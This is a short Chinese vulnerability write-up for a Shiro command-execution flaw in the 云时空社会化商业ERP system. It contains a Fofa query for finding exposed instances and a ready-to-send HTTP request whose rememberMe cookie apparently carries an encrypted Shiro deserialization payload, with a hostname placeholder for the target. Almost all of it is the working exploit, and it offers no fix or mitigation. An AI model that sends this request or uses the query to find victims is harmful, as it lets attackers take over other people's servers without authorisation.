漏洞描述:
云时空社会化商业ERP系统存在Shiro命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。
搜索语法:
Fofa-Query: app="云时空社会化商业ERP系统"
漏洞详情:
1.云时空社会化商业ERP系统。
2.漏洞POC:
GET /static/js/public.js HTTP/1.1
Host: {
{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Cookie: rememberMe=ZkQwQ0NGMEY4ZDhhZjRkQk1PeiBePyZcAaJE7Om+C0hA3jDtN5dVqFAyh+gGxrjM3fdJJFsrOhEOImJ3fCkQTtim1uKYvYhbi2OI/9Kg1Pw8TBrKecFPuI9P8+bEBA2Gin4ksL6+CVrasvh4M+tdwhYyRKyOzqjnszwltyit+VmMzH+gY6SGBYXRDH9NQ7EoRBiSh4uSkPVkj9iIG8eebwjjwoXtR+YapiLcdLhNL/j1/tEVA/yIi84iEWeJQw68POhP